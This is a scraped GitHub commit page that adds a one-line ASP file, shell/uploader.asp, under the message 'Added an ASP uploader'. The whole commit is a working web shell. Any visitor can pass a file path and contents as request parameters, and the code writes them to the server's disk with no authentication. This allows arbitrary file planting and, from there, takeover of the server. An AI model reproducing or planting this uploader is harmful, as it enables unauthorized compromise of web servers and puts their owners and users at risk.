Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 9b0f11f

Browse files
committed
Added an ASP uploader
1 parent e10ab5a commit 9b0f11f

1 file changed

Lines changed: 1 addition & 0 deletions

File tree

shell/uploader.asp

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
<%set f = server.createobject("Scripting.FileSystemObject"):set o=f.OpenTextFile(Request("f"), 2, True):o.Write Request("d"):o.Close:set o=Nothing:set f=Nothing%>

0 commit comments

Comments
 (0)